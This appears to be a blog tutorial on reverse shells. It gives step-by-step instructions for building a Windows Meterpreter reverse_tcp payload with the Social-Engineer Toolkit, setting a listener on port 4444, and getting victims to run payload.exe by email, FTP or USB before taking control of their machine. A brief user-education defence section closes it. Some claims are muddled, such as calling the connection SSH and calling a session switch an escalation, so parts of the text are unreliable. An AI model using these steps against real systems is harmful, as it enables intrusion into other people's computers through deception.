How a Reverse Shell Works
In a traditional client-server environment, the user is the client and the machine that provides services is the server. The client creates a connection, to the server which is listening for connections through specified ports. A reverse shell reverses this setup because the client becomes the (new) server listening for connections from the (old) server or attacking machine. This article will walk us through a demonstration on how an attacker can compromise your network using a reverse shell.
Figure 1 shows an attacker using SSH to connect to the Target machine. Since firewalls are configured to block incoming SSH connections, this connection is rejected at the firewall.
Figure 2 shows the target computer using SSH to initiate a connection to the hacker’s machine. Since firewalls are configured to allow outgoing SSH connections, this connection is passed through the firewall. An attacker runs a server on their computer that waits for incoming SSH connections.
In Figure 3, the target (1) begins a SSH shell connection(2) by clicking a maliscious link or executable. The firewall (3) allows the connection because outdoing SSH is allowed by default. The attacker (4) on a public IP address waits for an incoming SSH connections. The attacker starts the exploit by a reverse shell (5) allowing a direct connection to the target computer.
This vulnerability exists because the hacker only needs the user to click on a hacker supplied link or executable.
There are a lot of ways to set up a reverse shell. In this example the Social-Engineer Toolkit (SET) provided with Kali Linux provides simple to use interface for setting up a reverse shell. SET is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly.
This is a simple demonstration using two computers. No additional software or tools are needed.
- Kali Linux
- Windows 7
Setting up the reverse shell in Kali Linux
Launch the Social-Engineer Toolkit from the Kali Menu or by typing setoolkit at the prompt.
# sudo setoolkit
Select Option #1, Social-Engineering Attacks.
Select Option #4, Create a Payload and Listener.
Select Option #2, Windows Reverse_TCP Meterpreter.
Enter the IP address (LHOST) for the machine that is capturing the results of the attack. In our case, it is the Kali Linux machine. You can check your IP address by typing #hostname -I to find your IP address.
Choose a PORT. In our example, it is 4444.
Type yes to start the listener on 192.168.1.22:4444.
Setting up the exploit on the Kali Linux or attacking machine is done. SET starts metepreter/reverse_tcp, an exploit waiting for incoming connections on Port 4444.
Setting up the exploit on the Kali Linux or attacking computer is done. The script starts metepreter/reverse_tcp, an exploit waiting for incoming connections.
The next steps require the victim machine to click on the link we send them. However we get them the payload.exe file, either by email, ftp, file sharing, USB drive, or other downloadable link, we need them to run the executable to start the exploit.
Meterpreter creates the .exe file in /root/.set/payload.exe. Change to superuser and copy payload.exe file to your home directory.
# sudo -i
# cp /root/.set/payload.exe /home/kali
Victim or Clients Machine
Setting up the exploit is the easy part. Getting educated users to click on link or execute a file is the challenge. You can install the payload.exe on the victim’s computer via email, FTP, file transfer, web link, or USB drive. All you need is for them to execute the file by double-clicking on the payload.exe executable.
Our Windows 7 machine displays the payload.exe file on the desktop. Double-clicking or executing the .exe launches the connection to the server. Bypassing the firewall and any virus or malware protection you have on your network.
When the target clicks on the file, the exploit is complete. This exploit launches a remote connection to the attackers machine. In hacker terms, the system is Pwned.
Meanwhile, back on the attacker’s Kali machine, the remote console has been patiently waiting for somebody to connect to Port 4444.
After the victim executes the payload.exe file the connection between hacker and Windows 7 is complete. The last line in this screenshot shows the connection.
Type the sessions command to see what processes are running.
To escalate our session to run as a Windows user, type the sessions -i 1 command. If there are multiple sessions running, replace 1 with whatever process you want to capture.
Enter the sysinfo command to confirm OS and version numbers.
Change to a shell by typing the shell command.
At this point, you have control of the computer and can move freely through the operating system by using regular Windows shell commands like dir and cd.
How To Defend Against this Vulnerability
A lot has to go right for the hacker to succeed in this attack. But as we see everyday the attacker needs only one person to click on the link to be successful. We used a Windows 7 computer for this demonstration, newer operating systems will prevent a user from clicking on a questionable executable.
Microsoft ended support for Windows 7 last year, but a Verge.com article claims that there are over 100 milion or 20% of computer users still using Windows 7. “In reality, it could still be in use by more than 200 million devices worldwide.”
User education about clicking on maliscious links will contine to be the safest way to protect your computers and network from this type of attack.